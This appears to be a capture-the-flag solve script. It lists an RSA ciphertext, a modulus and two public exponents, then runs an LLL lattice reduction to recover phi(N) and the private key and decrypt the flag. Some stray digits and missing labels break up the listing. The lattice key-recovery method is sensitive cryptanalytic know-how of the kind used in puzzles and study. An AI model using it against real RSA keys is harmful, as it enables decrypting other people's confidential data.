621762251045983266546589262742077056901761505758616282139860180520
294114130199610630948384554435331068898512856688812062730461978896
550717296237834283267302523654274510531108136128918294741736300869
899449462228229808281574649010180112666932831903406027085633419430
025271852343210666327353337433569778504453080170055493551867512226
748755362216403339448564059716305656384237185703151486523517715746
219841327983087970570848592955861083128624324922914558382778188473
508354381883997155444299428898747384287358825771965832858103389182
2672997846833635917945202914668666249069209
N =
327704199063655154339194866047748377300483661546348646619543042402
260458534101350044000928583250118734194187256215886625771489682622
806492392158515139856977282405831771426953889407535449903946471081
769989651651591222623997395529035591781660724645156930487601579241
488206427939500937938255588575188735472745545946966631822161787569
690670592431700668322671046133380934851245111908808167859798212265
435088714280150547423032692815776965063410936310739819923896759441
335001874930520763236975226711207654895127866843378461328154795776
319242290600812698882674645791266238574096744538101900116337068936
957681128459670057096430909525261047967406584507167977208793797870
831858199445206260549902066723878612723426168458993576999172766781
960053959813246897054556640370355234535221471564607870502627719243
185861171079980645221020435603883953809425799723857745727457620742
919434348781413514988026742127568571934186958953140598517500511323
011929458037325804993377002532922851586492715993738894057370890612
824581248076082409851337738126905208244299232520865145447167051764
102587067960512092944943632792165293701233755265831135001570237083
525408605939160927853199431652266761149838259483979450360702066085
191758469080084577999970704509262494734276631
5
e1 =
113093816717144841270493376736752441673022256694148583901036760385
290294469429291287395932962657459627279948131588586212784590640516
333875415213429718659370434377813079419901793552309461703882586527
503420999488191213528380154291270445702806410792319417099800769397
301837093257916765727595155732721396733301006197816845511287287300
240373894663383088203656193754454195781571647148298850615901090657
526494250418115895409707363373152838151538570469978232752856573089
149548109243765929129792122940993776991512134978235283946198861884
114007985343254462515565194689101887047325062995222232830812585485
386335674066695574712424013748788932584416194906037669948036361191
560447424191340446408227050317480535979753006991332324053550385053
870295648784077492339350541225982286056281016618014141105366605422
149895221611592416532345771815704307846206281439784932410973601384
402414039900782254330313269415078960064305344681778478762050176778
461863907418405687378915582516510150832198276943089812715818203025
913800315465878924192853193803827276622946514235810979197716378589
261982901063684489176009723390727783448898996904743318965120718829
513279206531437783722261301609689797505310206968838386508504975439
758618002450017650730285740872724819939789165
6
e2 =
520784802242233176685694625439335648020233315036318660607609058232
253756893711940811689671211031740538418030746960229830407033429274
724173761594060357040912794702362534613844927042210511917607360605
543444697905470318310052804430718259068491360683455456766060272908
336208271643139931316184313237522767343589523009450774630417666521
249374919345775996757611711031293044212158686999046988150214592108
157111459059701972034578216909910625389552085786113690770133454547
457764623704458887788524087623286723476033810982968611147489646670
169496808853835334718258960849680027392565778520201820536838989790
882852419430752827631200573362834437858845826550336938550475796906
207139877232034439683439393971802337498729658644929705383526075801
274333885777281973827854475388302632779455717147494603818517391466
719503054220543434394727883299649591903578031268240738900411112406
618652725850847223731909368279406071589358172777730956937781876825
949576871569149291236837622348525849820772458720098637391873811567
556867266331105515676590090610339970832411635514893234739688540601
082980853279295821658846621558746399768293470665616360020175164850
074194164460647394129842296631518274348500179159711083883316628656
10040555809970494140145365617095067391830661
a = 0.198 # 811./4097
M1 = N**0.5
M2 = N**(a + 1)
D = diagonal_matrix(ZZ, [N, M1, M2, 1])
M = matrix(ZZ, [[1, -N, 0, N**2], [0, e1, -e1, -e1 * N], [0, 0,
e2, -e2 * N],
 [0, 0, 0, e1 * e2]]) * D
L = M.LLL()
t = vector(ZZ, L[0])
x = t * M**(-1)
phi = int(x[1] / x[0] * e1)
d = inverse(0x10001, phi)
m = pow(c, d, N)
print(long_to_bytes(m))